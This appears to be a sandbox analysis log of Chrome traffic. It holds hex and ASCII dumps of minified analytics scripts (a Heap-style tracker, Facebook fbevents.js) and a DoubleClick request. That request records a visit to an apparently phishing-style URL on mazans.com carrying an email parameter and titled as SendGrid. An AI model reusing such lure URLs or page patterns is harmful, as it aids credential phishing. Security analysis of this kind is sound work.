                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC16384INData Raw: 66 69 6e 64 4c 61 73 74 28 62 65 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3b 72 65 74 75 72 6e 20 75 65 28 65 5b 31 5d 29 3d 3d 3d 74 7d 29 29 3b 69 66 28 62 65 3d 5b 5d 2c 72 29 76 61 72 20 6e 3d 72 5b 30 5d 2c 61 3d 72 5b 31 5d 3b 54 65 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 69 28 61 7c 7c 7b 7d 29 2e 63 68 61 69 6e 28 29 2e 70 69 63 6b 28 5b 27 66 6f 72 6d 41 63 74 69 6f 6e 27 2c 27 66 6f 72 6d 45 6e 63 74 79 70 65 27 2c 27 66 6f 72 6d 4d 65 74 68 6f 64 27 2c 27 66 6f 72 6d 4e 6f 56 61 6c 69 64 61 74 65 27 2c 27 66 6f 72 6d 54 61 72 67 65 74 27 2c 27 6e 61 6d 65 27 2c 27 74 79 70 65 27 2c 27 76 61 6c 75 65 27 5d 29 2e 70 69 63 6b 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 61 65 28 61 2c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: findLast(be,(function(e){var r;return ue(e[1])===t}));if(be=[],r)var n=r[0],a=r[1];Te(e,(function(){var r=i(a||{}).chain().pick(['formAction','formEnctype','formMethod','formNoValidate','formTarget','name','type','value']).pick((function(e,t){return ae(a,
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC16384INData Raw: 28 6f 29 29 7b 6e 2e 61 64 64 53 69 6e 67 6c 65 45 76 65 6e 74 50 72 6f 70 73 28 6f 29 2c 61 3d 6e 2e 62 75 69 6c 64 28 21 31 29 3b 76 61 72 20 75 3d 48 2b 27 3f 27 2b 5a 2b 28 61 3d 61 3f 27 26 27 2b 61 3a 27 27 29 2b 27 26 73 74 3d 27 2b 28 6e 65 77 20 44 61 74 65 29 2e 67 74 28 29 2b 7a 65 28 29 2b 4a 65 28 29 2c 63 3b 6e 65 77 20 49 6d 61 67 65 28 31 2c 31 29 2e 73 72 63 3d 75 7d 65 6c 73 65 20 56 74 28 27 61 64 64 55 73 65 72 50 72 6f 70 65 72 74 69 65 73 20 2d 20 6e 6f 20 76 61 6c 69 64 20 70 72 6f 70 73 27 29 7d 65 6c 73 65 20 56 74 28 27 61 64 64 55 73 65 72 50 72 6f 70 65 72 74 69 65 73 20 2d 20 6e 6f 6e 2d 6f 62 6a 65 63 74 20 70 72 6f 70 73 20 61 72 67 75 6d 65 6e 74 27 29 3b 65 6c 73 65 20 4e 74 2e 70 75 73 68 28 5b 27 61 64 64 55 73 65 72 50
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: (o)){n.addSingleEventProps(o),a=n.build(!1);var u=H+'?'+Z+(a=a?'&'+a:'')+'&st='+(new Date).gt()+ze()+Je(),c;new Image(1,1).src=u}else Vt('addUserProperties - no valid props')}else Vt('addUserProperties - non-object props argument');else Nt.push(['addUserP
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC16384INData Raw: 5c 5c 5d 29 2f 67 2c 27 24 31 2e 2a 3f 27 29 2b 27 24 27 29 2c 43 65 3d 61 65 2e 41 72 72 61 79 42 75 66 66 65 72 2c 4f 65 3d 53 65 2e 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 2c 4e 65 3d 4f 72 28 61 65 2c 27 53 65 74 27 29 2c 50 65 3d 79 65 2e 73 70 6c 69 63 65 2c 6b 65 3d 61 65 2e 55 69 6e 74 38 41 72 72 61 79 2c 52 65 3d 4f 72 28 61 65 2c 27 57 65 61 6b 4d 61 70 27 29 2c 4d 65 3d 4d 61 74 68 2e 63 65 69 6c 2c 4c 65 3d 4f 72 28 4f 62 6a 65 63 74 2c 27 63 72 65 61 74 65 27 29 2c 78 65 3d 4d 61 74 68 2e 66 6c 6f 6f 72 2c 55 65 3d 4f 72 28 41 72 72 61 79 2c 27 69 73 41 72 72 61 79 27 29 2c 6a 65 3d 61 65 2e 69 73 46 69 6e 69 74 65 2c 48 65 3d 4f 72 28 4f 62 6a 65 63 74 2c 27 6b 65 79 73 27 29 2c 56 65 3d 4d 61 74 68 2e 6d 61 78 2c 44 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: \\])/g,'$1.*?')+'$'),Ce=ae.ArrayBuffer,Oe=Se.propertyIsEnumerable,Ne=Or(ae,'Set'),Pe=ye.splice,ke=ae.Uint8Array,Re=Or(ae,'WeakMap'),Me=Math.ceil,Le=Or(Object,'create'),xe=Math.floor,Ue=Or(Array,'isArray'),je=ae.isFinite,He=Or(Object,'keys'),Ve=Math.max,De
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC16384INData Raw: 6e 20 61 6e 28 65 29 7b 76 61 72 20 74 3d 59 65 28 65 29 3b 72 65 74 75 72 6e 20 74 2e 5f 5f 63 68 61 69 6e 5f 5f 3d 21 30 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 75 6e 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 74 2e 63 61 6c 6c 28 72 2c 65 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 6e 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 74 2e 63 61 6c 6c 28 72 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 73 6e 28 29 7b 72 65 74 75 72 6e 20 61 6e 28 74 68 69 73 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 6e 28 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 65 74 28 74 68 69 73 2e 76 61 6c 75 65 28 29 2c 74 68 69 73 2e 5f 5f 63 68 61 69 6e 5f 5f 29 7d 76 61 72 20 66 6e 3d 49 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 55 74 28 65 29 2c 74 68 69 73 2e 74 68 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: n an(e){var t=Ye(e);return t.__chain__=!0,t}function un(e,t,r){return t.call(r,e),e}function cn(e,t,r){return t.call(r,e)}function sn(){return an(this)}function ln(){return new et(this.value(),this.__chain__)}var fn=In((function(e){return e=Ut(e),this.thr
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC16384INData Raw: 74 29 7b 31 3d 3d 28 6f 3d 65 5b 69 5d 28 74 29 29 2e 6c 65 6e 67 74 68 3f 72 5b 72 2e 6c 65 6e 67 74 68 5d 3d 6f 2e 69 74 65 6d 28 30 29 3a 6f 2e 6c 65 6e 67 74 68 26 26 28 72 3d 72 2e 63 6f 6e 63 61 74 28 55 28 6f 29 29 29 7d 29 29 29 2c 6e 2e 6c 65 6e 67 74 68 3e 31 26 26 72 2e 6c 65 6e 67 74 68 3e 31 3f 71 28 72 29 3a 72 29 3a 55 28 74 5b 69 5d 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72 6e 20 6e 65 28 65 2c 74 29 7d 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 5b 5d 2c 69 2c 6f 2c 61 2c 63 2c 73 2c 6c 3b 69 66 28 6f 3d 28 65 3d 65 2e 72 65 70 6c 61 63 65 28 67 2c 27 24 31 27 29 29 2e 6d 61 74 63 68 28 76 29 29 7b 66 6f 72 28 73 3d 4d 28 6f 5b 32 5d 29 2c 69 3d 74 5b 6e 5d 28 6f 5b 31 5d 7c 7c 27 2a 27 29 2c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: t){1==(o=e[i](t)).length?r[r.length]=o.item(0):o.length&&(r=r.concat(U(o)))}))),n.length>1&&r.length>1?q(r):r):U(t[i](e))}catch(e){}return ne(e,t)},ne=function(e,t){var r=[],i,o,a,c,s,l;if(o=(e=e.replace(g,'$1')).match(v)){for(s=M(o[2]),i=t[n](o[1]||'*'),
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC4759INData Raw: 63 6b 65 64 29 72 65 74 75 72 6e 20 6f 28 69 29 7d 72 65 74 75 72 6e 20 65 2e 63 68 65 63 6b 65 64 3f 27 74 72 75 65 27 3a 27 66 61 6c 73 65 27 7d 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 74 2e 6c 65 6e 67 74 68 3e 36 34 3f 74 2e 73 6c 69 63 65 28 30 2c 36 34 29 3a 74 7d 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 70 74 69 6f 6e 73 5b 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 5d 2c 72 3b 72 65 74 75 72 6e 20 74 2e 76 61 6c 75 65 3f 6e 65 77 20 52 65 67 45 78 70 28 2f 5e 5b 5e 5c 77 5d 2f 29 2e 74 65 73 74 28 74 2e 76 61 6c 75 65 29 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 74 2e 69 6e 6e 65 72 48 54 4d 4c 3f 6e 75 6c 6c 3a 74 2e 76 61 6c 75 65 3a 6e 75 6c 6c 7d 2c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: cked)return o(i)}return e.checked?'true':'false'},u=function(e){var t=e.value;return t.length>64?t.slice(0,64):t},c=function(e){var t=e.options[e.selectedIndex],r;return t.value?new RegExp(/^[^\w]/).test(t.value)&&t.value===t.innerHTML?null:t.value:null},


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          67192.168.2.1749874142.250.185.984436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC1475OUTGET /td/rul/923239173?random=1731515353497&cv=11&fst=1731515353497&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4b70v875390547z89126943770za201zb9126943770&gcd=13t3t3t3t5l1&dma=0&tag_exp=101823848~101925629~102067554~102077854&u_w=1280&u_h=1024&url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&ref=https%3A%2F%2Fsepedatua.com%2F&hn=www.googleadservices.com&frm=0&tiba=Page%20not%20found%20%7C%20SendGrid&did=dNTIxZG&gdid=dNTIxZG&npa=0&pscdl=noapi&auid=1581689275.1731515350&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: td.doubleclick.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlaHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC785INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:15 GMT
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Server: cafe
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: test_cookie=CheckForPermission; expires=Wed, 13-Nov-2024 16:44:15 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC18INData Raw: 64 0d 0a 3c 68 74 6d 6c 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: d<html></html>
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          68192.168.2.1749878157.240.253.14436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC361OUTGET /en_US/fbevents.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: connect.facebook.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          timing-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                                                                                                                                          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                                                                                                                                          content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-S8CNvjYR' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                                                                                                                                                                                                          document-policy: force-load-at-top
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC1671INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC1INData Raw: 2f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: /
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC14680INData Raw: 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69 74
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: *** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wit
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC16384INData Raw: 26 63 21 3d 6e 75 6c 6c 26 26 61 21 3d 6e 75 6c 6c 26 26 64 21 3d 6e 75 6c 6c 3f 7b 64 6f 6d 61 69 6e 5f 75 72 69 3a 62 2c 65 76 65 6e 74 5f 74 79 70 65 3a 63 2c 65 78 74 72 61 63 74 6f 72 5f 74 79 70 65 3a 64 2c 69 64 3a 61 7d 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 67 28 61 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d 3d 22 6f 62 6a 65 63 74 22 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 61 3d 61 2e 65 78 74 72 61 63 74 6f 72 5f 63 6f 6e 66 69 67 3b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d 3d 22 6f 62 6a 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: &c!=null&&a!=null&&d!=null?{domain_uri:b,event_type:c,extractor_type:d,id:a}:null}function g(a){if(a==null||(typeof a==="undefined"?"undefined":i(a))!=="object")return null;a=a.extractor_config;if(a==null||(typeof a==="undefined"?"undefined":i(a))!=="obje
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC16384INData Raw: 72 20 6b 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 6b 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 62 3d 61 2e 54 79 70 65 64 3b 61 2e 63 6f 65 72 63 65 3b 61 2e 65 6e 66 6f 72 63 65 3b 61 3d 62 2e 61 72 72 61 79 4f 66 28 62 2e 6f 62 6a 65 63 74 57 69 74 68 46 69 65 6c 64 73 28 7b 61 6c 6c 6f 63 61 74 69 6f 6e 3a 62 2e 6e 75 6d 62 65 72 28 29 2c 63 6f 64 65 3a 62 2e 73 74 72 69 6e 67 28 29 2c 6e 61 6d 65 3a 62 2e 73 74 72 69 6e 67 28 29 2c 70 61 73 73 52 61 74 65 3a 62 2e 6e 75 6d 62 65 72 28 29 7d 29 29 3b 6b 2e 65 78 70 6f 72 74 73 3d 61 7d 29 28
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: r k={exports:{}};k.exports;(function(){"use strict";var a=f.getFbeventsModules("SignalsFBEventsTyped"),b=a.Typed;a.coerce;a.enforce;a=b.arrayOf(b.objectWithFields({allocation:b.number(),code:b.string(),name:b.string(),passRate:b.number()}));k.exports=a})(
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC16384INData Raw: 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 64 3d 63 2e 54 79 70 65 64 2c 65 3d 63 2e 63 6f 65 72 63 65 3b 66 75 6e 63 74 69 6f 6e 20 67 28 61 2c 63 2c 66 2c 67 2c 68 29 7b 61 3d 65 28 61 2c 62 29 3b 63 3d 65 28 63 2c 64 2e 73 74 72 69 6e 67 28 29 29 3b 76 61 72 20 6a 3d 7b 7d 3b 66 21 3d 6e 75 6c 6c 26 26 28 74 79 70 65 6f 66 20 66 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 66 29 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 28 6a 3d 66 29 3b 66 3d 67 21 3d 6e 75 6c 6c 26 26 74 79 70 65 6f 66 20 67 3d 3d 3d 22 73 74 72 69 6e 67 22 3f 67 3a 6e 75 6c 6c 3b 67 3d 7b 7d 3b 68 21 3d 6e 75 6c 6c 26 26 28 74 79 70 65 6f 66 20 68 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: es("SignalsFBEventsTyped"),d=c.Typed,e=c.coerce;function g(a,c,f,g,h){a=e(a,b);c=e(c,d.string());var j={};f!=null&&(typeof f==="undefined"?"undefined":i(f))==="object"&&(j=f);f=g!=null&&typeof g==="string"?g:null;g={};h!=null&&(typeof h==="undefined"?"und
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC1703INData Raw: 6c 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 61 29 7b 76 61 72 20 62 3d 5b 5d 3b 61 3d 6a 5b 61 2e 69 64 5d 7c 7c 7b 7d 3b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 63 29 26 26 62 2e 70 75 73 68 28 61 5b 63 5d 29 3b 72 65 74 75 72 6e 20 62 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 61 29 7b 72 65 74 75 72 6e 20 6e 28 61 29 2e 6c 65 6e 67 74 68 3e 30 7d 66 75 6e 63 74 69 6f 6e 20 70 28 61 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 61 29 3f 65 5b 61 5d 3a 61 7d 66 75 6e 63 74 69 6f 6e 20 71 28 61 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: l}function n(a){var b=[];a=j[a.id]||{};for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&b.push(a[c]);return b}function o(a){return n(a).length>0}function p(a){return Object.prototype.hasOwnProperty.call(e,a)?e[a]:a}function q(a){return Object.pro
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC14681INData Raw: 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 69 66 28 74 68 69 73 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 76 61 72 20 66 3d 62 28 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 2c 64 2e 6f 62 6a 65 63 74 28 29 29 3b 69 66 28 66 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 66 3d 6b 28 69 28 6a 28 66 29 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 63 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 2e 6d 61 70 21 3d 6e 75 6c 6c 26 26 61 20 69 6e 20 63 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 2e 6d 61 70 3f 63 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 2e 6d 61 70 5b 61 5d 3a 6e 75 6c 6c 7d 29
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: tsResolvedModules==null)return;if(this.moduleEncodings==null)return;var f=b(g.fbq.__fbeventsResolvedModules,d.object());if(f==null)return;f=k(i(j(f),function(a){return c.moduleEncodings.map!=null&&a in c.moduleEncodings.map?c.moduleEncodings.map[a]:null})
